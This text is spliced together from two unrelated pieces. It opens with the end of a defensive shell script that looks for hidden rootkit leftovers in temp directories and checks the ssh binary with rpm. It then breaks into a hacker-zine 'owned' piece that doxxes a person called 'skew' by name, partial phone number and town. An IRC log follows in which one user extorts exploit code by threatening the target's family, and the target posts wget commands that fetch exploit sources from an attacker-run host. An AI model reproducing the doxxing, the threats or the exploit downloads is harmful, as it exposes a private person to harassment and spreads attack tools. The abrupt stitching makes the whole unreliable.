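            .|..|'') ;;      # the search root itself, not a finding
            *[!.]*) ;;       # has a non-dot character: ordinary hidden dir
            *) printf '%s\n' "$path" ;;
        esac
    done
}

# Hidden *.log files in a temp directory, like /var/tmp/.ssheist.log.
find_hidden_logs() {
    find "$1" -type f -name '.*.log' 2>/dev/null
}

# Read `rpm -V` output on stdin; succeed if FILE is reported as missing or
# with a changed digest ("5" in the third flag column).
rpm_reports_changed() {
    awk -v f="$1" '
        $NF == f && ($1 == "missing" || substr($1, 3, 1) == "5") { hit = 1 }
        END { exit (hit ? 0 : 1) }'
}

# Check the live host. Returns 1 if anything was found.
scan_host() {
    status=0
    for dir in /tmp /var/tmp; do
        [ -d "$dir" ] || continue
        hits=$(find_dot_dirs "$dir"; find_hidden_logs "$dir")
        if [ -n "$hits" ]; then
            printf 'suspicious entries under %s:\n%s\n' "$dir" "$hits"
            status=1
        fi
    done
    if command -v rpm >/dev/null 2>&1 && [ -e /usr/bin/ssh ]; then
        if rpm -Vf /usr/bin/ssh 2>/dev/null | rpm_reports_changed /usr/bin/ssh; then
            echo '/usr/bin/ssh differs from the packaged binary'
            status=1
        fi
    fi
    return $status
}

# Constructed sample tree (not real data) so the checks can be tried safely.
demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/tmp/..." "$d/tmp/.ICE-unix" "$d/var/tmp"
    : > "$d/var/tmp/.ssheist.log"
    : > "$d/var/tmp/app.log"
    printf '%s\n' "$d"
}

if [ "${1:-}" = "--scan" ]; then
    scan_host
else
    # No arguments: run the checks against the constructed tree only.
    demo=$(demo_tree)
    find_dot_dirs "$demo/tmp"
    find_hidden_logs "$demo/var/tmp"
    rm -rf "$demo"
fi
```

Run with `--scan` as root to check the live host; a clean rpm result only means as much as the RPM database itself, which an intruder with root could also have altered.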
[5] GET SKEWS DOCS ;)
1-304-475-****
skew = Jeremy Brown
Jerry F Colegrove - (304) 475-**** - , Lenore, WV 25676
[6] MAKE HIM HAND HIS CODE OVER :D
00:50 <m0hawk> so you want peace.
00:51 <skew> yes
00:51 <skew> thats all i ever wanted
00:51 <m0hawk> we want some code.
00:51 <m0hawk> in exchange.
00:51 <m0hawk> 0day code.
00:51 <m0hawk> as a peace offering.
00:51 <m0hawk> and in return, no one else will hassle you/your parents/your grand parents
00:51 <skew> i dont have much.. a few things ive coded
00:51 <skew> will that be sufficent?
00:51 <m0hawk> well, hook up.
00:52 <m0hawk> it should, yes, as long as its all good
00:52 <skew> hold
00:52 <skew> its what i coded, what i got heh
00:52 <skew> dcc?
00:52 <skew> er
00:52 <skew> hold ill give u www
00:53 <m0hawk> alright.
00:53 <m0hawk> although i would prefer dcc.
00:53 <skew> dcc is fucked here router sucks sorry
00:54 <skew> wget http://skew.blackhat.ru/oboom.c
00:54 <m0hawk> alright.
00:55 <skew> as far as 0day, thats what i got
00:55 <skew> i code private things from pub advs alot
00:56 <skew> but you said 0day so thats all ive written atm
00:56 <m0hawk> well, hook up.
00:56 <m0hawk> private is close.
00:56 <skew> ok
00:56 <m0hawk> do you still run skewtty.dyndns.org?
00:57 <skew> nope
00:57 <m0hawk> 2 private exploits. and then an apology, a PUBLIC apology on your website,
to xtix.
00:57 <m0hawk> well, issue a public apology on blackhat.ru.
00:57 <skew> wget http://skew.blackhat.ru/shoutdead.c
00:57 <skew> wget http://skew.blackhat.ru/imap4life.pl
00:57 <m0hawk> shoutdead is old.
00:58 <skew> hrm
00:59 <skew> wget http://skew.blackhat.ru/gotfault-newspost.c
00:59 <m0hawk> alright, its cool. but the last part now.
[7] State a public apology to a friend.
00:57 <m0hawk> a PUBLIC apology on your website, to xtix.
01:03 <m0hawk> paste the link to apology in #darpa on here
01:03 <m0hawk> #phrack and #darknet at efnet.
01:05 <skew> * #phrack :Nick/channel is temporarily unavailable
Jul 07 02:06:44 --> You are now talking on #darknet
Jul 07 02:06:45 --- Topic for #darknet is love everyone, don't be under the influence of
the Illuminati and have hate and ware in mind,Ocultism is a form of 'maya
Jul 07 02:06:45 --- Topic for #darknet set by SoftIce!awk@hella.secret at Wed Jul 06
07:10:35 2005
Jul 07 02:06:52 <skew> http://skew.blackhat.ru/news.html
Jul 07 02:06:54 <-- skew has quit (Client Quit)
Jul 07 01:14:11 --> You are now talking on #darpa
Jul 07 01:14:11 --- Topic for #darpa is skew... ew
Jul 07 01:14:11 --- Topic for #darpa set by camel at Wed Jul 06 17:52:55 2005
Jul 07 02:05:05 <skew> http://skew.blackhat.ru/news.html
Jul 07 02:10:25 <-- skew has quit (Quit: nite *)
================ EOF
=========================================================================================
I hope skew has learned from all of this not to talk shit about people. don't fuck over
your friends (you know how it feels now).
stop coding shit, stop the lies, admit you're tal0n and don't think you are better than
people. you are not.
NEWS: skew has changed nicks once again but.... i'll let you find him yourself. it's as
easy as eating bread. ;)
=============================================================================================================